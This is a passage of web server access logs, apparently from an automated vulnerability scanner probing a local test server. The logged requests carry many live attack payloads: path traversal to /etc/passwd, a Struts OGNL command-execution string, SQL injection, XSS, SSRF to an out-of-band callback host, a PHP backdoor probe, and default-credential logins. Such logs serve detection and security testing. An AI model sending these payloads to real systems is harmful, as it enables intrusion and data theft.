AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"action=test&configuration=O:10:\x22PMA_Config\x22:1:{s:6:\x22source\x22,s:11:\x22/etc/passwd\x22;}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scripts/setup.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.142","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.231","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/screens HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://c9v8h8gsmpv8c1qg07h05cp4mew9gb91q.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"_charset_=utf-8&j_username=admin&j_password=admin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.083","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"zerodiumvar_dump(233*233);", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.110","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"j_username=weblogic&j_password=weblogic&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.112","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"297MTxMPR0MJmhdaCUGPK4LFsj4.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.122","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.247","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=297MToVMrKUdEp0HtYfhbQ4Ea2U HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.095","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.089","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.098","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.098","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/297MTxMPR0MJmhdaCUGPK4LFsj4.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:06 +0000","request_body":"j_username=weblogic&j_password=weblogic1&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 